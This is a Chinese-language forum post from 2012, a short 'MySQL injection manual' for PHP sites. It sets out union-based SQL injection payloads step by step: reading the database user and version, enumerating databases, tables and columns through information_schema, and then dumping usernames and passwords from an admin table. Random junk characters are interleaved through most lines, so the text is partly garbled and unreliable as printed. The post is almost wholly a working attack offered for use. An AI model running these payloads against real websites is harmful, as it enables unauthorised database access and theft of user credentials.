找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2144|回复: 0
打印 上一主题 下一主题

mysql盲注手册

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:27:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
4 I& p. n4 b) y2 }" y" O
教程内容:Mysql 5+php 注入
8 A; w" g6 `$ ^* p' p5 g% J' R/ m- T3 L% p/ _
; u3 ^! X' [& s( y* r- Q

" |% H. d6 F% y7 X$ v# v一.查看MYSQL基本信息(库名,版本,用户)
1 z0 }' h1 Q% g/ x# M1 Y: {8 f: Q* o9 ^
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
/ f4 c6 P- x% Y# [2 O4 M: n' q  q$ g) l1 f" ?! f
二.查数据库& ]+ ?; O% y( @1 `2 t

; ~4 a2 A- b) y' @2 ^( h# _) a5 Zand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
: {) i! Q6 }5 Blimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。/ \7 B0 D! ?& N. B5 K1 o" Z$ S; @
2 @6 u9 S, t1 G/ g
三.暴表
, E4 N- ?& S6 @( {4 m/ Z; e" G
7 e* Q6 j: b6 ~& wand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*2 z. J3 f4 B1 j5 q* C7 `

% }* A4 A1 m6 H8 {7 a6 qlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
: d) r; k4 T0 O4 G- {! f/ v' z" d$ R1 c+ J7 x( n" z
四.暴字段! M& j, h* R5 U7 |9 [

! ]; l3 f" ?5 P* F8 c- nand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*) [6 _7 I/ X# P+ M

1 z# X; r; j7 {limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。* p* ]1 p2 y# \

$ k6 L- H7 F+ @& q3 ?+ ~5 r五.暴数据- \% d+ Y+ f3 w" O' z3 z
( h9 J8 s  u# |2 ]* {8 B0 c+ m& ~
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*% i" c, |& k2 ~8 `7 ^1 Y: n9 B
# b! Z& a) H, I, O9 ]

2 k* T6 l( _3 p+ T" f4 U3 K这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
0 |% g) ]9 \8 k0 _& {4 |* V9 j+ B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表